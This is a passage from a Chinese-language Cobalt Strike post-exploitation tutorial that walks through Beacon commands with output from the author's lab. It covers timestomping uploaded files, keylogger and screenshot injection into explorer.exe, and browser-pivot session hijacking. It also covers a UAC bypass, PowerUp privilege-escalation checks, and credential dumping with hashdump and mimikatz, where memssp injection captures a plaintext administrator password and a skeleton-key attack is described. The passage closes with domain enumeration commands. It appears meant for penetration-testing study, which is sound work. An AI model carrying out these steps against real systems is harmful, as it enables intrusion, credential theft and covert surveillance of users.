</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>随后，在CS中新建一个外部<code>Foreign</code>监听器，这里设置的监听IP与端口和MSF中的一致即可，随后在CS中利用<code>spawn</code>选择刚新建的外部监听器，MSF中即可返回会话。</p> <h2 id="_3、文件系统">3、文件系统 <a href="#_3、文件系统" class="header-anchor">#</a></h2> <p>浏览会话系统文件位置在右击会话处，选择 <code>Explore --&gt; File Browser</code>即可打开。在这里可以对当前会话下的文件进行浏览、上传、下载、删除等操作。</p> <p>在进行文件浏览时，如果 beacon 设置的 sleep 值较高，CS会因此而变得响应比较慢。</p> <p>彩色文件夹表示该文件夹的内容位于此文件浏览器的缓存中；深灰色的文件夹表示该文件夹的内容不在此文件浏览器缓存中。</p> <p><strong>文件下载</strong></p> <p><code>download</code>：下载请求的文件。Beacon 会下载它的任务要求获取的每一个文件的固定大小的块。这个块的大小取决于 Beacon 当前的数据通道。HTTP 和 HTTPS 通道会拉取 512kb 的数据块。</p> <p><code>downloads</code>：查看当前 Beacon 正在进行的文件下载列表。</p> <p><code>cancel</code>：该命令加上一个文件名来取消正在进行的一个下载任务。也可以在 cancel 命令中使用通配符来一次取消多个文件下载任务。</p> <p>下载文件都将下载到CS团队服务器中，在<code>View --&gt; Download</code>下可看到下载文件的记录，选中文件后使用<code>Sync Files</code>即可将文件下载到本地。</p> <p><strong>文件上传</strong></p> <p><code>upload</code>：上传一个文件到目标主机上。</p> <p><code>timestomp</code>：将一个文件的修改属性访问属性和创建时间数据与另一个文件相匹配。当上传一个文件时，有时会想改变此文件的时间戳来使其混入同一文件夹下的其他文件中，使用timestomp 命令就可以完成此工作。</p> <h2 id="_4、用户驱动溢出攻击">4、用户驱动溢出攻击 <a href="#_4、用户驱动溢出攻击" class="header-anchor">#</a></h2> <p>Beacon 运行任务的方式是以<code>jobs</code>去运行的，比如键盘记录、PowerShell 脚本、端口扫描等，这些任务都是在 beacon check in 之间于后台运行的。</p> <p><code>jobs</code>：查看当前 Beacon 中的任务</p> <p><code>jobkill</code>：加上任务 ID，对指定任务进行停止</p> <p><strong>屏幕截图</strong></p> <p><code>screenshot</code>：获取屏幕截图，使用<code>screenshot pid</code>来将截屏工具注入到一个 x86 的进程中，使用<code>screenshot pid x64</code>注入到一个 x64 进程中，explorer.exe 是一个好的候选程序。</p> <p>使用<code>screenshot [pid] [x86|x64] [time]</code>来请求截屏工具运行指定的秒数，并在每一次 Beacon 连接到团队服务器的时候报告一张屏幕截图，这是查看用户桌面的一种简便方法。要查看截屏的具体信息，通过<code>View --&gt; Screenshots</code>来浏览从所有 Beacon 会话中获取的截屏。</p> <p><strong>键盘记录</strong></p> <p><code>keylogger</code>：键盘记录器，使用<code>keylogger pid</code>来注入一个 x86 程序。使用<code>keylogger pid x64</code>来注入一个 x64 程序，explorer.exe 是一个好的候选程序。</p> <p>使用单独的 keylogger 命令来将键盘记录器注入一个临时程序。键盘记录器会监视从被注入的程序中的键盘记录并将结果报告给 Beacon，直到程序终止或者自己杀死了这个键盘记录后渗透任务。要查看键盘记录的结果，可以到<code>View --&gt; Keystrokes</code>中进行查看。</p> <p><strong>其他</strong></p> <p>除了上述使用命令的方式进行屏幕截图和键盘记录，也可以来到<code>Explore --&gt; Process List</code>下选择要注入的进程，再直接点击屏幕截图或键盘记录的功能按钮。</p> <p>从使用上，具体注入那个程序都是可以的，只是注入 explorer.exe 会比较稳定与持久。值得注意的是，多个键盘记录器可能相互冲突，每个桌面会话只应使用一个键盘记录器。</p> <h2 id="_5、浏览器转发">5、浏览器转发 <a href="#_5、浏览器转发" class="header-anchor">#</a></h2> <p>浏览器转发是指在已经攻击成功的目标中，利用目标的信息登录网站进行会话劫持，但是目前只支持目标正在使用IE浏览器的前提下。关于如何判断当前用户是否使用IE浏览器，则可以通过屏幕截图来判断。如下图中，通过屏幕截图可以看到目标正在使用IE浏览器登陆着当前网站的admin账户。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs11-1.png" alt=""></p> <p>找到目前正在使用IE浏览器的目标后，右击该会话，选择<code>Explore --&gt; Browser Pivot</code>，随后选择要注入的进程，CS 会在它认为可以注入的进程右边显示一个对勾，设置好端口后，点击运行即可。</p> <p>此时，在浏览器中配置代理，代理配置为http代理，IP为CS团队服务器IP，端口为刚设置的端口。</p> <p>代理配置好后，在浏览器中打开目标当前正在打开的网址，即可绕过登录界面。</p> <h2 id="_6、端口扫描">6、端口扫描 <a href="#_6、端口扫描" class="header-anchor">#</a></h2> <p><code>portscan</code>：进行端口扫描，使用参数为：<code>portscan [targets] [ports] [discovery method]</code>。</p> <p>目标发现<code>discovery method</code>有三种方法，分别是：<code>arp、icmp、none</code>，<code>arp</code>方法使用 ARP 请求来发现一个主机是否存活。<code>icmp</code>方法发送一个 ICMP echo 请求来检查一个目标是否存活。<code>none</code>选项让端口扫描工具假设所有的主机都是存活的。</p> <p>端口扫描会在 Beacon 和团队服务器通讯的这个过程中不停运行。当它有可以报告的结果，它会把结果发送到 Beacon 控制台。Cobalt Strike 会处理这个信息并使用发现的主机更新目标模型。</p> <p>右击 Beacon会话，在<code>Explore --&gt; Port Scan</code>中即可打开端口扫描的图形窗口，CS会自动填充扫描地址，确认扫描地址、端口、扫描方式等无误后，开始扫描即可。扫描结束后，在 target table页面中可看到扫描结果，右击会话，选择 Services 可查看详细的扫描结果。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs11-2.png" alt=""></p> <h1 id="_0x05-提权">0x05 提权 <a href="#_0x05-提权" class="header-anchor">#</a></h1> <h2 id="_1、用户账户控制">1、用户账户控制 <a href="#_1、用户账户控制" class="header-anchor">#</a></h2> <p>自 Windows vista 开始，Windows 系统引进了用户账户控制机制，即 UAC<code>User Account Control</code>机制，UAC 机制在 Win 7中得到了完善。UAC 与 UNIX 中的 sudo 工作机制十分相似，平时用户以普通权限工作，当用户需要执行特权操作时，系统会询问他们是否要提升权限。</p> <p>此时系统用户可分为以下三种等级：</p> <p>高：管理员权限</p> <p>中：一般用户权限</p> <p>低：受限制的权限</p> <p>使用<code>whoami /groups</code>命令可以看到当前用户所在的组以及权限，使用<code>net localgroup administrators</code>可以查看当前在管理员组里的用户名。</p> <h2 id="_2、提权操作">2、提权操作 <a href="#_2、提权操作" class="header-anchor">#</a></h2> <p>当某些操作需要管理员权限，而当前用户权限只有一般用户权限时，就需要提权操作了。</p> <p>在 CS 中有以下几种提权操作：</p> <p><code>bypassuac</code>：将本地中级管理员权限提升至本地高级管理员权限，适用于Win 7 及以上的系统。</p> <p><code>elevate</code>：将任意用户的权限提升至系统权限，适用于2018年11月更新之前的 Win 7 和 Win 10 系统。</p> <p><code>getsystem</code>：将本地高级管理员权限提升至系统权限。</p> <p><code>runas</code>：使用其他用户的凭证来以其他用户身份运行一个命令，该命令不会返回任何输出。</p> <p><code>spawnas</code>：使用其他用户的凭证来以其他用户身份派生一个会话，这个命令派生一个临时的进程并将 payload stage 注入进那个进程。</p> <h3 id="spawn-as">Spawn As <a href="#spawn-as" class="header-anchor">#</a></h3> <p>首先，右击待提权的会话，选择<code>Access --&gt; Spawn As</code>，输入目标系统用户身份信息，其中域信息填写一个“点”代表本地用户，监听器这里选择的 SMB 监听器，之后点击运行就能看到对应的用户上线了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs12-1.png" alt=""></p> <h3 id="bypass-uac">Bypass UAC <a href="#bypass-uac" class="header-anchor">#</a></h3> <p>Bypass UAC 有两个步骤，分别是：</p> <p>1、利用 UAC 漏洞来获取一个特权文件副本</p> <p>2、使用 DLL 劫持进行代码执行</p> <p>首先使用<code>shell whoami /groups</code>查看当前上线主机用户的所属组及 UAC 等级</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs13-1.png" alt=""></p> <p>通过返回信息可以看出，当前用户为管理员权限，UAC 等级为中，根据上一节中关于的介绍，此时可以使用<code>bypassuac</code>进行提权。</p> <p>首先，右击会话，选择<code>Access --&gt; Elevate</code>，这里选择一个 SMB Beacon，Exploit 选择<code>uac-token-duplication</code>，最后 Launch 即可。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs13-2.png" alt=""></p> <p>待 Beacon Check in 后，当前用户 UAC 为高权限的会话便会上线了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs13-3.png" alt=""></p> <h2 id="_3、powerup">3、PowerUp <a href="#_3、powerup" class="header-anchor">#</a></h2> <p>PowerUp 所做的事是寻找可能存在弱点的地方，从而帮助提权。</p> <p>利用 PowerUp 进行提权需要首先导入 ps1 文件<code>powershell-import PowerUp.ps1</code>，再执行<code>powershell Invoke-AllChecks</code>命令，使用 PowerUp 脚本可以快速的帮助我们发现系统弱点，从而实现提权的目的。</p> <blockquote><p>其中<code>PowerUp.ps1</code>文件可从这里下载：<a href="https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc" target="_blank" rel="noopener noreferrer">https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></blockquote> <p><strong>PowerUp 的使用</strong></p> <p>执行以下命令：将 ps1 文件上传到目标主机，并执行所有弱点检查。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>powershell-import PowerUp.ps1
powershell invoke-allchecks
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>详细运行过程：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>beacon&gt; powershell-import PowerUp.ps1
[*] Tasked beacon to import: PowerUp.ps1
[+] host called home, sent: 275084 bytes

beacon&gt; powershell invoke-allchecks
[*] Tasked beacon to run: invoke-allchecks
[+] host called home, sent: 313 bytes
[+] received output:
[*] Running Invoke-AllChecks
[+] Current user already has local administrative privileges!
[*] Checking for unquoted service paths...

[*] Checking service executable and argument permissions...
[+] received output:
ServiceName                     : AeLookupSvc
Path                            : C:\Windows\system32\svchost.exe -k netsvcs
ModifiableFile                  : C:\Windows\system32
ModifiableFilePermissions       : GenericAll
ModifiableFileIdentityReference : BUILTIN\Administrators
StartName                       : localSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AeLookupSvc'
CanRestart                      : True
……内容太多，此处省略……

[*] Checking service permissions...
[+] received output:
ServiceName   : AeLookupSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs
StartName     : localSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AeLookupSvc'
CanRestart    : True
……内容太多，此处省略……

[*] Checking %PATH% for potentially hijackable DLL locations...
[+] received output:
Permissions       : GenericAll
ModifiablePath    : C:\Windows\system32\WindowsPowerShell\v1.0\
IdentityReference : BUILTIN\Administrators
%PATH%            : %SystemRoot%\system32\WindowsPowerShell\v1.0\
AbuseFunction     : Write-HijackDll -DllPath 'C:\Windows\system32\WindowsPowerS
                    hell\v1.0\\wlbsctrl.dll'
……内容太多，此处省略……

[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...

[*] Checking for modifidable registry autoruns and configs...
[+] received output:
Key            : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VMware Use
                 r Process
Path           : &quot;C:\Program Files\VMware\VMware Tools\vmtoolsd.exe&quot; -n vmusr
ModifiableFile : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files
                 \VMware\VMware Tools\vmtoolsd.exe; IdentityReference=BUILTIN\A
                 dministrators}
……内容太多，此处省略……

[*] Checking for modifiable schtask files/configs...
[+] received output:
TaskName     : GoogleUpdateTaskMachineCore
TaskFilePath : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files (
               x86)\Google\Update\GoogleUpdate.exe; IdentityReference=BUILTIN\A
               dministrators}
TaskTrigger  : &lt;Triggers xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mi
               t/task&quot;&gt;&lt;LogonTrigger&gt;&lt;Enabled&gt;true&lt;/Enabled&gt;&lt;/LogonTrigger&gt;&lt;Cal
               endarTrigger&gt;&lt;StartBoundary&gt;2020-04-11T21:47:44&lt;/StartBoundary&gt;&lt;
               ScheduleByDay&gt;&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;&lt;/ScheduleByDay&gt;&lt;/Ca
               lendarTrigger&gt;&lt;/Triggers&gt;
……内容太多，此处省略……

[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml

[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[+] received output:
[*] Checking for cached Group Policy Preferences .xml files....
[+] received output:
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br><span class="line-number">50</span><br><span class="line-number">51</span><br><span class="line-number">52</span><br><span class="line-number">53</span><br><span class="line-number">54</span><br><span class="line-number">55</span><br><span class="line-number">56</span><br><span class="line-number">57</span><br><span class="line-number">58</span><br><span class="line-number">59</span><br><span class="line-number">60</span><br><span class="line-number">61</span><br><span class="line-number">62</span><br><span class="line-number">63</span><br><span class="line-number">64</span><br><span class="line-number">65</span><br><span class="line-number">66</span><br><span class="line-number">67</span><br><span class="line-number">68</span><br><span class="line-number">69</span><br><span class="line-number">70</span><br><span class="line-number">71</span><br><span class="line-number">72</span><br><span class="line-number">73</span><br><span class="line-number">74</span><br><span class="line-number">75</span><br><span class="line-number">76</span><br><span class="line-number">77</span><br><span class="line-number">78</span><br></div></div><p>如果在自己的靶机上发现导入ps1文件失败，这可能是因为系统不允许执行不信任的脚本文件导致的。</p> <p>这时为了复现成功可以来到靶机下，以管理员权限打开 Powershell，运行<code>set-ExecutionPolicy RemoteSigned</code>，输入<code>Y</code>回车，此时系统便能导入<code>PowerUp.ps1</code>文件了。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>PS C:\WINDOWS\system32&gt; set-ExecutionPolicy RemoteSigned
执行策略更改
执行策略可帮助你防止执行不信任的脚本。更改执行策略可能会产生安全风险，如 https:/go.microsoft.com/fwlink/?LinkID=135170
中的 about_Execution_Policies 帮助主题所述。是否要更改执行策略?
[Y] 是(Y)  [A] 全是(A)  [N] 否(N)  [L] 全否(L)  [S] 暂停(S)  [?] 帮助 (默认值为“N”): Y
PS C:\WINDOWS\system32&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>在运行<code>Invoke-AllChecks</code>后，便会列出当前系统中可被提权的弱点之处，之后再执行检查结果中<code>AbuseFunction</code>下的命令便能开始提权操作了。</p> <p>但是我在自己本地环境中并未复现成功，执行<code>AbuseFunction</code>后的命令只能创建一个与当前登录用户相同权限的账户，没能达到提权的目的。</p> <p>参考网上相关文章后也未果，这也是为什么这一节拖更这么久的原因，因此 PowerUp 的复现过程暂时就没法记录了。</p> <p>如果正在看本篇文章的你有过使用 PowerUp 提权成功的经历，欢迎留言分享。</p> <h2 id="_4、凭证和哈希获取">4、凭证和哈希获取 <a href="#_4、凭证和哈希获取" class="header-anchor">#</a></h2> <p>想要获取凭证信息，可以在管理员权限的会话处右击选择<code>Access --&gt; Dump Hashes</code>，或者在控制台中使用<code>hashdump</code>命令。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs14-1.png" alt=""></p> <p>想获取当前用户的密码，可以运行<code>mimikatz</code>，右击管理员权限会话选择<code>Access --&gt; Run Mimikatz</code>，或在控制台运行<code>logonpasswords</code>命令。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs14-2.png" alt=""></p> <p>在<code>View --&gt; Credentials</code>下可以查看到<code>hashdump</code>与<code>mimikatz</code>获取的数据。</p> <h2 id="_5、beacon-中的-mimikatz">5、Beacon 中的 Mimikatz <a href="#_5、beacon-中的-mimikatz" class="header-anchor">#</a></h2> <p>在 Beacon 中集成了 mimikatz ，mimikatz 执行命令有三种形式：</p> <ul><li><p><code>mimikatz [module::command] &lt;args&gt;</code></p> <p>运行 mimikatz 命令</p></li> <li><p><code>mimikatz [!module::command] &lt;args&gt;</code></p> <p>强制提升到 SYSTEM 权限再运行命令，因为一些命令只有在 SYSTEM 身份下才能被运行。</p></li> <li><p><code>mimikatz [@module::command] &lt;args&gt;</code></p> <p>使用当前 Beacon 的访问令牌运行 mimikatz 命令</p></li></ul> <p>下面是一些<code>mimikatz</code>命令。</p> <ul><li><p><code>!lsadump::cache</code></p> <p>获取缓存凭证，默认情况下 Windows 会缓存最近10个密码哈希</p></li> <li><p><code>!lsadump::sam</code></p> <p>获取本地账户密码哈希，该命令与 hashdump 比较类似</p></li> <li><p><code>misc::cmd</code></p> <p>如果注册表中禁用了 CMD ，就重新启用它</p></li> <li><p><code>!misc::memssp</code></p> <p>注入恶意的 Windows SSP 来记录本地身份验证凭据，这个凭证存储在“C:\windows\system32\mimilsa.log”中</p></li> <li><p><code>misc::skeleton</code></p> <p>该命令仅限域内使用。该命令会给所有域内用户添加一个相同的密码，域内所有的用户都可以使用这个密码进行认证，同时原始密码也可以使用,其原理是对 lsass.exe 进行注入，重启后会失效。</p></li> <li><p><code>process::suspend [pid]</code></p> <p>挂起某个进程，但是不结束它</p></li> <li><p><code>process::resume [pid]</code></p> <p>恢复挂起的进程</p></li></ul> <p>以上的这些只是<code>mimikatz</code>能做事情的一小部分，下面看看<code>!misc::memssp</code>的使用。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>mimikatz !misc::memssp
cd C:\Windows\system32
shell dir mimilsa.log
shell type mimilsa.log
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>详细运行过程：</p> <p>首先运行<code>mimikatz !misc::memssp</code></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>beacon&gt; mimikatz !misc::memssp
[*] Tasked beacon to run mimikatz's !misc::memssp command
[+] host called home, sent: 1006151 bytes
[+] received output:
Injected =)
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>接下来来到<code>C:\Windows\system32</code>目录</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>beacon&gt; cd C:\Windows\system32
[*] cd C:\Windows\system32
[+] host called home, sent: 27 bytes

beacon&gt; shell dir mimilsa.log
[*] Tasked beacon to run: dir mimilsa.log
[+] host called home, sent: 46 bytes
[+] received output:
 驱动器 C 中的卷没有标签。
 卷的序列号是 BE29-9C84

 C:\Windows\system32 的目录

2020/07/23  21:47                24 mimilsa.log
               1 个文件             24 字节
               0 个目录 17,394,728,960 可用字节
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br></div></div><p>可以看到是存在<code>mimilsa.log</code>文件的，此时待目标主机重新登录，比如电脑锁屏后用户进行登录。</p> <p>查看<code>mimilsa.log</code>文件内容。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>beacon&gt; shell type mimilsa.log
[*] Tasked beacon to run: type mimilsa.log
[+] host called home, sent: 47 bytes
[+] received output:
[00000000:000003e5] \	
[00000000:002b99a7] WIN-75F8PRJM4TP\Administrator	Password123!
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>成功获取到当前登录用户的明文密码。</p> <h1 id="_0x06-横向扩展">0x06 横向扩展 <a href="#_0x06-横向扩展" class="header-anchor">#</a></h1> <h2 id="_1、windows-企业局域网环境介绍">1、Windows 企业局域网环境介绍 <a href="#_1、windows-企业局域网环境介绍" class="header-anchor">#</a></h2> <p><strong>活动目录</strong></p> <p>活动目录<code>Active Directory</code>是一种能够集中管理用户、系统和策略的技术，活动目录的一个重要概念就是<code>域</code>。</p> <p>Active Directory 存储有关网络上对象的信息，并让管理员和用户可以更容易地使用这些信息。例如 Active Directory 域服务即 AD DS 存储着有关用户账户的信息，并且使同一网络下的其他授权用户可以访问此信息。</p> <p><strong>域</strong></p> <p>域<code>Domain</code>即是一个管理员或者说是网络边界，在域里的用户和系统都是通过 AD进行管理的。</p> <p>在域里，如果想控制服务器进行操作就需要取得域的信任。</p> <p><strong>域控制器</strong></p> <p>域控制器<code>Domain Controller</code>顾名思义就是一个对域里的用户和系统进行身份验证的一个系统。</p> <p><strong>本地用户</strong></p> <p>本地用户<code>Local User</code>就是系统上的一个标准用户。</p> <p>当我们想在 Windows 命令行下指定一个本地的用户时，可以通过输入 <code>.\本地用户名</code>或者 <code>计算机名\本地用户名</code>来指定本地的用户账户，其中<code>.</code>表示计算机名。</p> <p><strong>域用户</strong></p> <p>域用户<code>Domain User</code>是指域控制器下的用户，如果想指定域用户，可以输入<code>域名\域用户名</code></p> <p><strong>本地管理员</strong></p> <p>本地管理员<code>Local Administrator</code>即是指在本地系统有管理权限的用户。</p> <p><strong>域管理员</strong></p> <p>域管理员<code>Domain Administrator</code>是指在域控制器上有管理权限的用户。</p> <blockquote><p>注意：以下命令是在主机中运行的结果，在 Cobalt Strike 中运行只需要根据命令类型在命令前加上 shell 或者 powershell 即可。</p></blockquote> <h2 id="_2、主机和用户枚举">2、主机和用户枚举 <a href="#_2、主机和用户枚举" class="header-anchor">#</a></h2> <h3 id="主机枚举">主机枚举 <a href="#主机枚举" class="header-anchor">#</a></h3> <p><strong>一些问题</strong></p> <p>当进入目标局域网时，需要弄清楚几个问题。</p> <p>1、我正处在那个域上？</p> <p>2、域信任关系是什么样的？</p> <p>3、可以登陆哪些域？这些域上有哪些系统？目标是什么？可以获取什么？</p> <p>4、系统上存放共享数据的地方在哪里？</p> <p><strong>一些枚举的命令</strong></p> <ul><li><p><code>net view /domain</code></p> <p>枚举出当前域</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; net view <span class="token operator">/</span>domain
Domain
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
TEAMSSIX
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><ul><li><p><code>net view /domain:[domain]</code>、<code>net group &quot;domain computers&quot; /domain</code></p> <p><code>net view /domain:[domain]</code>枚举域上一个主机的列表，但不是所有主机，这个也就是在网上邻居中可以看到的内容。</p> <p><code>net group &quot;domain computers&quot; /domain</code>可以获得加入到这个域中的电脑账户列表。</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; net view <span class="token operator">/</span>domain:teamssix
服务器名称            注解
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
\\WIN<span class="token operator">-</span>72A8ERDSF2P
\\WIN<span class="token operator">-</span>P2AASSD1AF1
命令成功完成。

<span class="token function">PS</span> C:\&gt; net <span class="token function">group</span> <span class="token string">&quot;domain computers&quot;</span> <span class="token operator">/</span>domain
组名     Domain Computers
注释     加入到域中的所有工作站和服务器
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
WIN<span class="token operator">-</span>72A8ERDSF2P$
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br></div></div><ul><li><p><code>nltest /dclist:[domain]</code></p> <p>如果想找到那个主机是域的域控服务器，可以使用<code>nltest</code>命令</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; nltest <span class="token operator">/</span>dclist:teamssix
获得域“teamssix”中 DC 的列表<span class="token punctuation">(</span>从“\\WIN<span class="token operator">-</span>P2AASSD1AF1”中<span class="token punctuation">)</span>。
    WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com <span class="token namespace">[PDC]</span>  <span class="token namespace">[DS]</span> 站点: Default<span class="token operator">-</span>First<span class="token operator">-</span>Site<span class="token operator">-</span>Name
此命令成功完成
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>​		当使用 32 位的 payload 运行在 64 位的系统上，并且 nltest 路径不对的时候，可能会提示没有 nltest 这个命令，这时可以尝试使用下面的命令为其指定路径。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; C:\windows\sysnative\nltest <span class="token operator">/</span>dclist:teamssix
获得域“teamssix”中 DC 的列表<span class="token punctuation">(</span>从“\\WIN<span class="token operator">-</span>P2AASSD1AF1”中<span class="token punctuation">)</span>。
    WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com <span class="token namespace">[PDC]</span>  <span class="token namespace">[DS]</span> 站点: Default<span class="token operator">-</span>First<span class="token operator">-</span>Site<span class="token operator">-</span>Name
此命令成功完成
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><ul><li><p><code>nslookup [name]</code>、<code>ping -n 1 -4 [name]</code></p> <p>有时在 Cobalt Strike 里，我们只需要使用目标的 NetBIOS 名称，而不用在意使用 IPv4 地址或者 IPv6 地址，NetBIOS 名称是在域上每台机器的完整名称。</p> <p>但是如果想通过一个 IPv4 地址转换为一个 NetBIOS 名称，可以使用 nslookup 命令，或者使用 ping 发送一个包来获得主机返回的 IP 地址。</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; nslookup WIN<span class="token operator">-</span>P2AASSD1AF1
服务器:  UnKnown
Address:  ::1
名称:    WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
Address:  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124

<span class="token function">PS</span> C:\&gt; ping <span class="token operator">-</span>n 1 <span class="token operator">-</span>4 WIN<span class="token operator">-</span>P2AASSD1AF1
